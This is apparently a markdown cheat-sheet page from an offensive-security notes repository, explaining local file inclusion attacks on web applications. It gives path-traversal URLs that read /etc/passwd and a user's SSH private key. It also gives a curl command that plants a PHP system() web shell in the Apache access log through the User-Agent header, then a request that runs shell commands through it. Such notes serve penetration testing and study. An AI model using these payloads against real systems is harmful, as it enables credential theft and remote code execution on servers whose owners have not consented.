killchain-compendium/exploit/web/local_file_inclusion.md

34 lines
1.6 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Local File Inclusion
2021-09-01 00:44:36 +02:00
To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
2021-08-23 01:13:54 +02:00
2021-09-11 02:55:17 +02:00
* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
2021-08-23 01:13:54 +02:00
## Usage
2021-09-01 00:44:36 +02:00
* Exploit URL parameter by including other files.
2021-08-23 01:13:54 +02:00
```
http://example.com/home?page=about.html
2021-09-01 00:44:36 +02:00
http://example.com/home?page=/etc/passwd
2021-08-23 01:13:54 +02:00
```
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
2021-09-01 00:44:36 +02:00
http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa
2021-08-23 01:13:54 +02:00
```
2021-09-01 00:44:36 +02:00
### Log Poisoning
* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.
* `www-data` needs read & write permisson in order to do so.
* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows
```sh
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
```
* Follow up with a request to
```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```
2021-09-11 02:55:17 +02:00